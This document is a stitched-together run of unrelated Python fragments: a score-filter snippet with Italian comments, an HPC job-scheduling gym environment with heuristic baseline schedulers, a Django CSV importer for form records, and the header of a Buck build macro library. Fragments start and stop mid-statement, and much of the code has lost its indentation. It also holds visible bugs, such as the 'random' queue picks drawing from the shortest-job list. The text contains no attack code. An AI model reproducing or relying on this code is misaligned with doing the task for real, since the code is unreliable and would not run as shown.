scoreMatrix = CSVreader(finalScorePath)
scoreMatrix.remove(scoreMatrix[0]) # Rimuovo l'intestazione
# probeHistory.json
with open(opHistoryPath) as f:
opHistory = json.load(f)
opFilter= [x.lower() for x in opFilter]
duplicateOP = check(opFilter)
if duplicateOP == False:
tmpMatrix,maxlenght = AddHistory(scoreMatrix,opHistory)
result = []
tmpMatrix2 = []
occurenceMatrix = []
for i in range(len(opFilter)):
occurenceMatrix.append(np.zeros((int(maxlenght),int(maxlenght))))
if operator == 'null':
print('errore,inserire operazioni')
elif (operator == 'equal'):
for i in range(len(tmpMatrix)):
if float(tmpMatrix[i][s]) == score:
_scoreFilter1(i,tmpMatrix,opFilter,occurenceMatrix,tmpMatrix2)
for i in range(len(tmpMatrix2)):
result.append(tmpMatrix2[i])
for i in range(len(occurenceMatrix)):
print(occurenceMatrix[i])
print("")
return result
elif (operator == 'over') and (score >= 0):
for i in range(len(tmpMatrix)):
if float(tmpMatrix[i][s]) >= score:
_scoreFilter1(i,tmpMatrix,opFilter,occurenceMatrix,tmpMatrix2)
for i | |
from HPC_Task import Task, Workloads
from HPC_Cluster import Cluster
import os
import math
import json
import time
import sys
import random
from random import shuffle
import numpy as np
import tensorflow as tf
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import scipy.signal
import gym
from gym import spaces
from gym.spaces import Box, Discrete
from gym.utils import seeding
# Maximum number of queued tasks visible to the agent (also the action space size).
MAX_QUEUE_SIZE = 512
# Width of the MLP hidden layers.
MLP_SIZE = 1024
MAX_WAIT_TIME = 8 * 60 * 60  # normalization cap for task wait time (8 hours)
MAX_RUN_TIME = 8 * 60 * 60  # normalization cap for task run time (8 hours)
# Features per task in the observation: wait time, requested run time,
# requested nodes, and a can-schedule-now flag.
TASK_FEATURES = 4
DEBUG = False
# Number of trace tasks sampled for one training episode.
TASK_SEQUENCE_SIZE = 512
def combined_shape(length, shape=None):
    """Prepend a batch dimension `length` to `shape` (None, scalar, or tuple)."""
    if shape is None:
        return (length,)
    if np.isscalar(shape):
        return (length, shape)
    return (length, *shape)
def placeholder(dim=None):
    """Create a float32 TF placeholder with a variable-sized batch axis."""
    shape = combined_shape(None, dim)
    return tf.placeholder(dtype=tf.float32, shape=shape)
def placeholders(*args):
    """Create one float32 placeholder per requested dimension, in order."""
    result = []
    for dim in args:
        result.append(placeholder(dim))
    return result
def placeholder_from_space(space):
    """Placeholder matching a gym space: floats for Box, int indices for Discrete."""
    if isinstance(space, Box):
        return placeholder(space.shape)
    if isinstance(space, Discrete):
        return tf.placeholder(dtype=tf.int32, shape=(None,))
    # Other gym space types are not supported.
    raise NotImplementedError
def placeholders_from_spaces(*args):
    """Create one placeholder per gym space, preserving argument order."""
    result = []
    for space in args:
        result.append(placeholder_from_space(space))
    return result
def get_vars(scope=''):
    """Return trainable TF variables whose name contains `scope`."""
    matching = []
    for variable in tf.trainable_variables():
        if scope in variable.name:
            matching.append(variable)
    return matching
def count_vars(scope=''):
    """Total number of scalar parameters in trainable variables under `scope`."""
    total = 0
    for var in get_vars(scope):
        total += np.prod(var.shape.as_list())
    return total
def discount_cumsum(x, discount):
    """Discounted cumulative sums from each index to the end of `x`.

    Computes y[t] = sum_{k >= t} discount**(k - t) * x[k], implemented as a
    single-pole IIR filter run over the reversed sequence.
    """
    reversed_sums = scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)
    return reversed_sums[::-1]
class HPC_Environment(gym.Env):
    def __init__(self):
        """Set up gym spaces and zero all scheduling state.

        my_init() must be called afterwards to attach a workload trace and
        cluster model before the environment can be used.
        """
        super(HPC_Environment, self).__init__()
        print("Initialize")
        # One discrete action per visible queue slot.
        self.action_space = spaces.Discrete(MAX_QUEUE_SIZE)
        # Flat observation: TASK_FEATURES normalized values per queue slot.
        self.observation_space = spaces.Box(low=0.0, high=1.0,
                                            shape=(TASK_FEATURES * MAX_QUEUE_SIZE,),
                                            dtype=np.float32)
        self.task_queue = []        # tasks waiting to be scheduled
        self.running_tasks = []     # tasks currently holding machines
        self.visible_tasks = []     # queue slice exposed in the observation
        self.pairs = []             # [task, features...] rows backing the observation
        self.current_timestamp = 0  # simulated wall-clock time
        self.start = 0              # trace index of the episode's first task
        self.next_arriving_task_idx = 0
        self.last_task_in_batch = 0
        self.num_task_in_batch = 0
        self.start_idx_last_reset = 0
        self.loads = None           # Workloads trace (set in my_init)
        self.cluster = None         # Cluster model (set in my_init)
        self.bsld_algo_dict = {}
        self.scheduled_rl = {}      # task_id -> score for the RL schedule
        self.penalty = 0
        self.pivot_task = False
        self.scheduled_scores = []  # episode totals from the heuristic baselines
        self.enable_preworkloads = False
        self.pre_workloads = []
    def my_init(self, workload_file='', sched_file=''):
        """Load the workload trace and build the cluster model.

        `sched_file` is accepted for interface compatibility but unused here.
        """
        print("loading from dataset:", workload_file)
        self.loads = Workloads(workload_file)
        # Processors are assumed evenly spread across the trace's nodes.
        self.cluster = Cluster("Cluster", self.loads.max_nodes, self.loads.max_procs / self.loads.max_nodes)
        # Worst-case score used to penalize illegal agent actions.
        self.penalty_task_score = TASK_SEQUENCE_SIZE * self.loads.max_exec_time / 10
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def f1_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (np.log10(request_time) * request_processors + 870 * np.log10(submit_time))
def f2_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (np.sqrt(request_time) * request_processors + 25600 * np.log10(submit_time))
def f3_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (request_time * request_processors + 6860000 * np.log10(submit_time))
def f4_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (request_time * np.sqrt(request_processors) + 530000 * np.log10(submit_time))
def sjf_score(self, task):
request_time = task.request_time
submit_time = task.submit_time
return (request_time, submit_time)
def smallest_score(self, task):
request_processors = task.request_number_of_processors
submit_time = task.submit_time
return (request_processors, submit_time)
def wfp_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
waiting_time = task.scheduled_time - task.submit_time
return -np.power(float(waiting_time) / request_time, 3) * request_processors
def uni_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
waiting_time = task.scheduled_time - task.submit_time
return -(waiting_time + 1e-15) / (np.log2(request_processors + 1e-15) * request_time)
def fcfs_score(self, task):
submit_time = task.submit_time
return submit_time
    def gen_preworkloads(self, size):
        """Pre-fill the cluster with up to `size` synthetic running tasks.

        Tasks are cloned from the trace entries immediately before the
        episode's start index and given negative ids; generation stops at
        the first clone that no longer fits on the cluster.
        """
        running_task_size = size
        for i in range(running_task_size):
            _task = self.loads[self.start - i - 1]
            req_num_of_processors = _task.request_number_of_processors
            runtime_of_task = _task.request_time
            task_tmp = Task()
            # Negative ids mark synthetic pre-workload tasks.
            task_tmp.task_id = (-1 - i)
            task_tmp.request_number_of_processors = req_num_of_processors
            task_tmp.run_time = runtime_of_task
            if self.cluster.can_allocated(task_tmp):
                self.running_tasks.append(task_tmp)
                # Pretend the task started at a random point in the past.
                task_tmp.scheduled_time = max(0, (self.current_timestamp - random.randint(0, max(runtime_of_task, 1))))
                task_tmp.allocated_machines = self.cluster.allocate(task_tmp.task_id, task_tmp.request_number_of_processors)
                self.pre_workloads.append(task_tmp)
            else:
                break
def refill_preworkloads(self):
for _task in self.pre_workloads:
self.running_tasks.append(_task)
_task.allocated_machines = self.cluster.allocate(_task.task_id, _task.request_number_of_processors)
    def reset(self):
        """Start a new training episode.

        Clears cluster/trace state, draws a random window of
        TASK_SEQUENCE_SIZE tasks from the trace, optionally pre-fills the
        cluster, and records baseline totals for several heuristic
        schedulers (each baseline run restores the sequence afterwards).

        Returns:
            tuple: (observation, critic_observation).
        """
        self.cluster.reset()
        self.loads.reset()
        self.task_queue = []
        self.running_tasks = []
        self.visible_tasks = []
        self.pairs = []
        self.current_timestamp = 0
        self.start = 0
        self.next_arriving_task_idx = 0
        self.last_task_in_batch = 0
        self.num_task_in_batch = 0
        self.scheduled_rl = {}
        self.penalty = 0
        self.pivot_task = False
        self.scheduled_scores = []
        task_sequence_size = TASK_SEQUENCE_SIZE
        self.pre_workloads = []
        # Random window that leaves room on both sides of the trace.
        self.start = self.np_random.randint(task_sequence_size, (self.loads.size() - task_sequence_size - 1))
        self.start_idx_last_reset = self.start
        self.num_task_in_batch = task_sequence_size
        self.last_task_in_batch = self.start + self.num_task_in_batch
        self.current_timestamp = self.loads[self.start].submit_time
        self.task_queue.append(self.loads[self.start])
        self.next_arriving_task_idx = self.start + 1
        if self.enable_preworkloads:
            self.gen_preworkloads(task_sequence_size + self.np_random.randint(task_sequence_size))
        # Heuristic baseline totals; schedule_curr_sequence_reset restores the
        # episode's initial state after each run.
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.sjf_score).values()))
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.smallest_score).values()))
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.fcfs_score).values()))
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f1_score).values()))
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f2_score).values()))
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f3_score).values()))
        self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f4_score).values()))
        return self.build_observation(), self.build_critic_observation()
    def reset_for_test(self, num, start):
        """Reset state for an evaluation episode of `num` tasks.

        NOTE(review): the `start` argument is currently ignored -- a random
        start index is drawn instead.  Confirm whether deterministic starts
        were intended for evaluation.
        """
        self.cluster.reset()
        self.loads.reset()
        self.task_queue = []
        self.running_tasks = []
        self.visible_tasks = []
        self.pairs = []
        self.current_timestamp = 0
        self.start = 0
        self.next_arriving_task_idx = 0
        self.last_task_in_batch = 0
        self.num_task_in_batch = 0
        self.scheduled_rl = {}
        self.penalty = 0
        self.pivot_task = False
        self.scheduled_scores = []
        task_sequence_size = num
        # Random window that leaves room on both sides of the trace.
        self.start = self.np_random.randint(task_sequence_size, (self.loads.size() - task_sequence_size - 1))
        self.start_idx_last_reset = self.start
        self.num_task_in_batch = task_sequence_size
        self.last_task_in_batch = self.start + self.num_task_in_batch
        self.current_timestamp = self.loads[self.start].submit_time
        self.task_queue.append(self.loads[self.start])
        self.next_arriving_task_idx = self.start + 1
    def moveforward_for_resources_backfill_greedy(self, task, scheduled_logs):
        """Advance simulated time until `task` can be allocated, backfilling
        queued tasks predicted to finish before `task`'s earliest start.

        `scheduled_logs` (task_id -> normalized score) is updated in place
        for every backfilled task.
        """
        assert not self.cluster.can_allocated(task)
        # Estimate `task`'s earliest start: walk running tasks in estimated
        # completion order, accumulating freed processors until `task` fits.
        earliest_start_time = self.current_timestamp
        self.running_tasks.sort(key=lambda running_task: (running_task.scheduled_time + running_task.request_time))
        free_processors = self.cluster.free_node * self.cluster.num_procs_per_node
        for running_task in self.running_tasks:
            # NOTE(review): assumes every allocated machine contributes a full
            # node's worth of processors -- confirm against Cluster.allocate.
            free_processors += len(running_task.allocated_machines) * self.cluster.num_procs_per_node
            earliest_start_time = (running_task.scheduled_time + running_task.request_time)
            if free_processors >= task.request_number_of_processors:
                break
        while not self.cluster.can_allocated(task):
            # Backfill: start any queued task that fits now and is predicted
            # to finish before earliest_start_time (FCFS order).
            self.task_queue.sort(key=lambda _j: self.fcfs_score(_j))
            task_queue_iter_copy = list(self.task_queue)
            for _j in task_queue_iter_copy:
                if self.cluster.can_allocated(_j) and (self.current_timestamp + _j.request_time) < earliest_start_time:
                    assert _j.scheduled_time == -1
                    _j.scheduled_time = self.current_timestamp
                    _j.allocated_machines = self.cluster.allocate(_j.task_id, _j.request_number_of_processors)
                    self.running_tasks.append(_j)
                    score = (self.task_score(_j) / self.num_task_in_batch)
                    scheduled_logs[_j.task_id] = score
                    self.task_queue.remove(_j)
            assert self.running_tasks
            # Advance time to the next event: a task arrival or a resource release.
            # NOTE(review): this sort keys on run_time while the estimate above
            # used request_time -- confirm whether the mismatch is intentional.
            self.running_tasks.sort(key=lambda running_task: (running_task.scheduled_time + running_task.run_time))
            next_resource_release_time = (self.running_tasks[0].scheduled_time + self.running_tasks[0].run_time)
            next_resource_release_machines = self.running_tasks[0].allocated_machines
            if self.next_arriving_task_idx < self.last_task_in_batch \
                    and self.loads[self.next_arriving_task_idx].submit_time <= next_resource_release_time:
                self.current_timestamp = max(self.current_timestamp, self.loads[self.next_arriving_task_idx].submit_time)
                self.task_queue.append(self.loads[self.next_arriving_task_idx])
                self.next_arriving_task_idx += 1
            else:
                self.current_timestamp = max(self.current_timestamp, next_resource_release_time)
                self.cluster.release(next_resource_release_machines)
                self.running_tasks.pop(0)
    def schedule_curr_sequence_reset(self, score_fn):
        """Schedule the whole current sequence greedily by `score_fn`, then
        restore the episode's initial queue/cluster state.

        Returns:
            dict: task_id -> normalized score (task_score / num_task_in_batch).
        """
        scheduled_logs = {}
        while True:
            # Always pick the best-ranked waiting task under score_fn.
            self.task_queue.sort(key=lambda j: score_fn(j))
            task_for_scheduling = self.task_queue[0]
            # If it does not fit, advance time (backfilling smaller tasks).
            if not self.cluster.can_allocated(task_for_scheduling):
                self.moveforward_for_resources_backfill_greedy(task_for_scheduling, scheduled_logs)
            assert task_for_scheduling.scheduled_time == -1
            task_for_scheduling.scheduled_time = self.current_timestamp
            task_for_scheduling.allocated_machines = self.cluster.allocate(task_for_scheduling.task_id,
                                                                           task_for_scheduling.request_number_of_processors)
            self.running_tasks.append(task_for_scheduling)
            score = (self.task_score(task_for_scheduling) / self.num_task_in_batch)
            scheduled_logs[task_for_scheduling.task_id] = score
            self.task_queue.remove(task_for_scheduling)
            # Pull in newly-arrived tasks; stop once the sequence is exhausted.
            not_empty = self.moveforward_for_task()
            if not not_empty:
                break
        # Roll the episode back to its initial state for the next scheduler.
        self.cluster.reset()
        self.loads.reset()
        self.task_queue = []
        self.running_tasks = []
        self.visible_tasks = []
        self.pairs = []
        self.current_timestamp = self.loads[self.start].submit_time
        self.task_queue.append(self.loads[self.start])
        self.last_task_in_batch = self.start + self.num_task_in_batch
        self.next_arriving_task_idx = self.start + 1
        if self.enable_preworkloads:
            self.refill_preworkloads()
        return scheduled_logs
    def build_critic_observation(self):
        """Build the critic's observation: normalized [submit, run, nodes]
        triples for each task in the episode window, with submit times
        measured relative to the window's first task.

        NOTE(review): the range end is inclusive of last_task_in_batch, so
        one extra pair is built; only the first TASK_SEQUENCE_SIZE pairs are
        copied into the output vector.
        """
        vector = np.zeros(TASK_SEQUENCE_SIZE * 3, dtype=float)
        earlist_task = self.loads[self.start_idx_last_reset]
        earlist_submit_time = earlist_task.submit_time
        pairs = []
        for i in range(self.start_idx_last_reset, self.last_task_in_batch + 1):
            task = self.loads[i]
            submit_time = task.submit_time - earlist_submit_time
            request_processors = task.request_number_of_processors
            request_time = task.request_time
            # Clamp just below 1.0 to keep all features in the open interval (0, 1).
            normalized_submit_time = min(float(submit_time) / float(MAX_WAIT_TIME), 1.0 - 1e-5)
            normalized_run_time = min(float(request_time) / float(self.loads.max_exec_time), 1.0 - 1e-5)
            normalized_request_nodes = min(float(request_processors) / float(self.loads.max_procs), 1.0 - 1e-5)
            pairs.append([normalized_submit_time, normalized_run_time, normalized_request_nodes])
        for i in range(TASK_SEQUENCE_SIZE):
            vector[i * 3:(i + 1) * 3] = pairs[i]
        return vector
def build_observation(self):
vector = np.zeros((MAX_QUEUE_SIZE) * TASK_FEATURES, dtype=float)
self.task_queue.sort(key=lambda task: self.fcfs_score(task))
self.visible_tasks = []
for i in range(0, MAX_QUEUE_SIZE):
if i < len(self.task_queue):
self.visible_tasks.append(self.task_queue[i])
else:
break
self.visible_tasks.sort(key=lambda j: self.fcfs_score(j))
self.visible_tasks = []
if len(self.task_queue) <= MAX_QUEUE_SIZE:
for i in range(0, len(self.task_queue)):
self.visible_tasks.append(self.task_queue[i])
else:
visible_f1 = []
f1_index = 0
self.task_queue.sort(key=lambda task: self.f1_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_f1.append(self.task_queue[i])
visible_f2 = []
f2_index = 0
self.task_queue.sort(key=lambda task: self.f2_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_f2.append(self.task_queue[i])
visible_sjf = []
sjf_index = 0
self.task_queue.sort(key=lambda task: self.sjf_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_sjf.append(self.task_queue[i])
visible_small = []
small_index = 0
self.task_queue.sort(key=lambda task: self.smallest_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_small.append(self.task_queue[i])
visible_random = []
random_index = 0
shuffled = list(self.task_queue)
shuffle(shuffled)
for i in range(0, MAX_QUEUE_SIZE):
visible_random.append(shuffled[i])
index = 0
while index < MAX_QUEUE_SIZE:
f1_task = visible_f1[f1_index]
f1_index += 1
f2_task = visible_f2[f2_index]
f2_index += 1
sjf_task = visible_sjf[sjf_index]
sjf_index += 1
small_task = visible_small[small_index]
small_index += 1
random_task = visible_sjf[random_index]
random_index += 1
if (not sjf_task in self.visible_tasks) and index < MAX_QUEUE_SIZE:
self.visible_tasks.append(sjf_task)
index += 1
if (not small_task in self.visible_tasks) and index < MAX_QUEUE_SIZE:
self.visible_tasks.append(small_task)
index += 1
if (not random_task in self.visible_tasks) and index < MAX_QUEUE_SIZE:
self.visible_tasks.append(random_task)
index += 1
self.pairs = []
add_skip = False
for i in range(0, MAX_QUEUE_SIZE):
if i < len(self.visible_tasks) and i < (MAX_QUEUE_SIZE):
task = self.visible_tasks[i]
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
wait_time = self.current_timestamp - submit_time
normalized_wait_time = min(float(wait_time) / float(MAX_WAIT_TIME), 1.0 - 1e-5)
normalized_run_time = min(float(request_time) / float(self.loads.max_exec_time), 1.0 - 1e-5)
normalized_request_nodes = min(float(request_processors) / float(self.loads.max_procs), 1.0 - 1e-5)
if self.cluster.can_allocated(task):
can_schedule_now = 1.0 - 1e-5
else:
can_schedule_now = 1e-5
self.pairs.append(
[task, normalized_wait_time, normalized_run_time, normalized_request_nodes, can_schedule_now])
else:
self.pairs.append([None, 0, 1, 1, 0])
for i in range(0, MAX_QUEUE_SIZE):
vector[i * TASK_FEATURES:(i + 1) * TASK_FEATURES] = self.pairs[i][1:]
return vector
def moveforward_for_resources_backfill(self, task):
assert not self.cluster.can_allocated(task)
earliest_start_time = self.current_timestamp
self.running_tasks.sort(key=lambda running_task: (running_task.scheduled_time + running_task.request_time))
free_processors = self.cluster.free_node * self.cluster.num_procs_per_node
for running_task in self.running_tasks:
free_processors += len(running_task.allocated_machines) * self.cluster.num_procs_per_node
earliest_start_time = (running_task.scheduled_time + running_task.request_time)
if | |
'\\r').replace('\n', '\\n')
csv_json = json.loads(post_data.get('csv_json').encode('utf-8').replace('\t', '\\t').replace('\r', '\\r').replace('\n', '\\n'))
print >> sys.stderr, post_data
#setup Dictionaries for post import self-referential needs
#setup a dict for hierarchy value
hierarchyDict = {}
#setup a recordreferencevalue dictionary for the form type if a particular reference is self-referencing to this same form type
selfReferenceList = []
#Get our current FormType
currentFormType = FormType.objects.all().filter(project=request.user.permissions.project, pk=request.POST['formtype_pk'])[0]
#Each row in the CSV file represents a new 'Form' of the 'currentFormType'
#Let's make a 'row' counter to help with indexing through the CSV file
row_index = 0
#Let's make an incremental counter for record type orders
order_counter = 1;
#I'm also going to make a List() of AttributeTypes/ReferenceTypes. This is done so that
#after 1 iteration of the importer loop, the reference types/ attribute types are already created. We
#don't need to create them for every row--so after the first row, we reference this list for the reference
# and attribute values
typeList = {}
print >> sys.stderr, "Just making sure things are working still....where's the stop point?"
main_ID_Field = ""
keepAliveTimer = time.clock()
#print >>sys.stderr, "Starting row loop: " + str(timerB) + " Time elapsed = " + str(timerB-timerA)
#For each row of the CSV
for row in csv_json:
print >> sys.stderr, "222 Just making sure things are working still....where's the stop point?"
timerBeginRow = time.clock()
#print >>sys.stderr, "Starting a new row: " + str(timerBeginRow)
#If we are past index '0' then let's continue with the rest of the importer
#Let's get the main ID
if row_index == 0:
for key, value in row.iteritems():
if 'record__'+key+'__ismainID' in post_data:
main_ID_Field = key
break
currentForm = Form.objects.all().filter(project=request.user.permissions.project, form_type=currentFormType, form_name=row[main_ID_Field])
if currentForm.exists():
currentForm = currentForm[0]
else:
print >>sys.stderr, "Skipping Form--Could not find form name:" + row[main_ID_Field]
continue
for key, value in row.iteritems():
print >>sys.stderr, key
if key != main_ID_Field:
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD REFERENCE TYPE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#------------------------------------------------------------------------------------------------------------------------
#Test if it is a reference type by checking the POST_DATA if 'record__(n)__isreference' exists
#If it is a reference Type:
if 'record__'+str(key)+'__isreference' in post_data:
#We want to make sure we only create the ReferenceType's once--otherwise we populate the database with several
#unecessary copies and relations that muddy everything. So if we're past the first row/iteration of the JSON, the reference types are
#already created and stored in a list to reference after
if row_index < 1:
#create a new FormRecordReferenceType and set "record_type" variable to the header column user-given name value
newFormRecordReferenceType = FormRecordReferenceType()
newFormRecordReferenceType.project = PROJECT
newFormRecordReferenceType.is_public = False
newFormRecordReferenceType.record_type = post_data.get('record__'+str(key)+'__name')
#also set "form_type_parent" to the current formType we are importing
newFormRecordReferenceType.form_type_parent = currentFormType
#now set "form_type_reference" to the selected FormTypeReference value in the current importer Column
#if the value == 'default' then set reference to this same FormType
if post_data.get('record__'+str(key)+'__reftype') == 'default':
newFormRecordReferenceType.form_type_reference = currentFormType
#otherwise set it to the given pk value of a FormType object
else:
newFormRecordReferenceType.form_type_reference = FormType.objects.get(pk=post_data.get('record__'+str(key)+'__reftype'))
#Set an arbitrary initial order for the type
newFormRecordReferenceType.order_number = order_counter
order_counter += 1
#save the Record Reference Type
newFormRecordReferenceType.save()
#add it to the list so that the reference value can reference it
typeList[key] = newFormRecordReferenceType
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD REFERENCE VALUE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#-------------------------------------------------------------------------------------------------------------------------
#If this form already has a FRRV for this importer(e.g. we are running multiple rows with the same ID) then just reference
# --that existing FRRV and add the new reference, as well as the ext_key
possibleFRRV = currentForm.ref_to_parent_form.all().filter(record_reference_type=typeList[key])
if possibleFRRV.exists():
newFormRecordReferenceValue = possibleFRRV[0]
newFormRecordReferenceValue.external_key_reference += "," + value
newFormRecordReferenceValue.save()
else:
#Create a new RecordReferenceValue
newFormRecordReferenceValue = FormRecordReferenceValue()
newFormRecordReferenceValue.project = PROJECT
newFormRecordReferenceValue.is_public = False
#set the "external_key_reference" to the column value of the csv row
newFormRecordReferenceValue.external_key_reference = value
#set the "form_parent" to the current row's Form
newFormRecordReferenceValue.form_parent = currentForm
#set the "record_reference_type" to the current RecordReferenceType
logging.info("line626 " + str(typeList[key].form_type_reference) + " :: " + newFormRecordReferenceValue.external_key_reference)
newFormRecordReferenceValue.record_reference_type = typeList[key]
#save the value to give it a pk value
newFormRecordReferenceValue.save()
#logging.info("We are about to check the reference for: " + str(newFormRecordReferenceValue))
#If this reference is self-referencing to the same form formtype we're importing, then similar to the hierchy references,
#--we need to store a list of the reference value objects to load once the entire form type has been imported. We don't need key values because
#--the external key reference is already saved for the lookup on the model.
#--I'm using the objects rather pk values because that will save us time on SQL queries later
if post_data.get('record__'+str(key)+'__reftype') == 'default':
selfReferenceList.append(newFormRecordReferenceValue)
else:
#Now we need to set the value for "record_reference" which will involve a query
#And since the external key could contain multiple values, we need to split them by the comma delimeter
#logging.info(newFormRecordReferenceValue.external_key_reference + " : BEFORE SPLIT")
possibleRefValues = newFormRecordReferenceValue.external_key_reference.split(",")
#logging.info(str(possibleRefValues) + " : SPLIT")
#clear our list of refs everytime to ensure we don't double add--it will use the ext key to find them
# --this isn't the fastest way of doing this, but I need a quick fix for now !!!TODO
newFormRecordReferenceValue.record_reference.clear()
#for all forms in the selected FormType reference
for aForm in newFormRecordReferenceValue.record_reference_type.form_type_reference.form_set.all().prefetch_related():
#if the current external ID value == to the iterated forms "form_num"
#Make sure we convert the INT form-num to a STR first or it will fail the check
for refValue in possibleRefValues:
if refValue == str(aForm.form_number):
#remove this value from future matches to ensure we don't double add it
possibleRefValues.remove(refValue)
#set the current FormRecordReferenceValue.record_reference to the current form in the loop iteration
newFormRecordReferenceValue.record_reference.add(aForm)
#logging.info(newFormRecordReferenceValue.external_key_reference + " : AFTER SPLIT")
#if there are no matches by the last iteration of the loop,
#we can do nothing to leave the record_reference value as "None" (the user can set this later)
#This might happen if the user is importing a new form type that references itself, or references
#another form type that hasn't yet been imported. The external_key_reference's are still saved
#so the user can run another tool to match these keys later once all the Form Types and forms have been
#imported through this tool
#save the RecordReferenceValue
newFormRecordReferenceValue.save()
#timerE = time.clock()
#print >>sys.stderr, "Ending ref lookup: " + str(timerE) + " Time elapsed = " + str(timerE-timerD)
#If it is not a reference type, then we are adding an attribute type instead
else:
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD ATTRIBUTE TYPE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#------------------------------------------------------------------------------------------------------------------------
#We want to make sure we only create the AttributeType's once--otherwise we populate the database with several
#unecessary copies and relations that muddy everything. So if we're past the first row, the attribute types are
#already created and stored in a list to reference after
if row_index < 1:
#create a new FormRecordAttributeType and set "record_type" variable to the header column name
newFormRecordAttributeType = FormRecordAttributeType()
newFormRecordAttributeType.record_type = post_data.get('record__'+str(key)+'__name')
newFormRecordAttributeType.project = PROJECT
newFormRecordAttributeType.is_public = False
#also set "form_type" to the current formType we are importing
newFormRecordAttributeType.form_type = currentFormType
#Set an arbitrary initial order for the type
newFormRecordAttributeType.order_number = order_counter
order_counter += 1
#save the RecordAttributeType
newFormRecordAttributeType.save()
#add the attributeType to the typeList so that the attribute value can reference it
typeList[key] = newFormRecordAttributeType
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD Attribute VALUE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#-------------------------------------------------------------------------------------------------------------------------
#If this form already has a FRRV for this importer(e.g. we are running multiple rows with the same ID) then just reference
# --that existing FRRV and add the new reference, as well as the ext_key
possibleFRAV = currentForm.formrecordattributevalue_set.all().filter(record_attribute_type=typeList[key])
if possibleFRAV.exists():
newFormRecordAttributeValue = possibleFRAV[0]
newFormRecordAttributeValue.record_value = newFormRecordAttributeValue.record_value + "," + value
newFormRecordAttributeValue.save()
else:
#Create a new RecordAttributeValue
newFormRecordAttributeValue = FormRecordAttributeValue()
newFormRecordAttributeValue.project = PROJECT
newFormRecordAttributeValue.is_public = False
#set the "record_value" to the column value of the csv row
newFormRecordAttributeValue.record_value = value
#set the "form_parent" to the current row's Form
newFormRecordAttributeValue.form_parent = currentForm
#set the "record_attribute_type" to the current RecordAttributeType
newFormRecordAttributeValue.record_attribute_type = typeList[key]
#save the RecordAttributeValue
newFormRecordAttributeValue.save()
row_index | |
<reponame>xw285cornell/buckit
#!/usr/bin/env python2
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# TODO(T20914511): Until the macro lib has been completely ported to
# `include_defs()`, we need to support being loaded via both `import` and
# `include_defs()`. These ugly preamble is thus here to consistently provide
# `allow_unsafe_import()` regardless of how we're loaded.
import contextlib
try:
    # Under Buck's include_defs() the build environment already provides
    # allow_unsafe_import; referencing it raises NameError under plain import.
    allow_unsafe_import
except NameError:
    @contextlib.contextmanager
    def allow_unsafe_import(*args, **kwargs):
        # No-op stand-in so `with allow_unsafe_import():` works everywhere.
        yield
import collections
import copy
import functools
import json
import pipes
import re
with allow_unsafe_import():
from distutils.version import LooseVersion
import os
import platform as platmod
import shlex
import textwrap
# Hack to make include_defs flake8 safe.
_include_defs = include_defs # noqa: F821
# Hack to make include_defs sane and less magical forr flake8
def include_defs(path):
    """Wrap Buck's native include_defs so it returns the loaded module.

    The native call injects the module under a caller-supplied global name;
    we stash it in a module-level temporary and delete it immediately so
    repeated calls don't leak state.
    """
    global _include_defs__imported
    _include_defs(path, '_include_defs__imported') # noqa: F821
    ret = _include_defs__imported
    del _include_defs__imported
    return ret
# Hack to make internal Buck macros flake8-clean until we switch to buildozer.
def import_macro_lib(path):
    """Load `path` from the configured fbcode macro library directory."""
    root = read_config('fbcode', 'macro_lib', '//macro_lib')  # noqa: F821
    return include_defs('%s/%s.py' % (root, path))
Rule = import_macro_lib('rule').Rule
target = import_macro_lib('target')
build_info = import_macro_lib('build_info')
load("@fbcode_macros//build_defs:allocators.bzl", "allocators")
load("@fbcode_macros//build_defs:build_mode.bzl", _build_mode="build_mode")
load("@fbcode_macros//build_defs:compiler.bzl", "compiler")
load("@fbcode_macros//build_defs:cpp_common.bzl", "cpp_common")
load("@fbcode_macros//build_defs:cpp_flags.bzl", "cpp_flags")
load("@fbcode_macros//build_defs:coverage.bzl", "coverage")
load("@fbcode_macros//build_defs:config.bzl", "config")
load("@fbcode_macros//build_defs:modules.bzl", "modules")
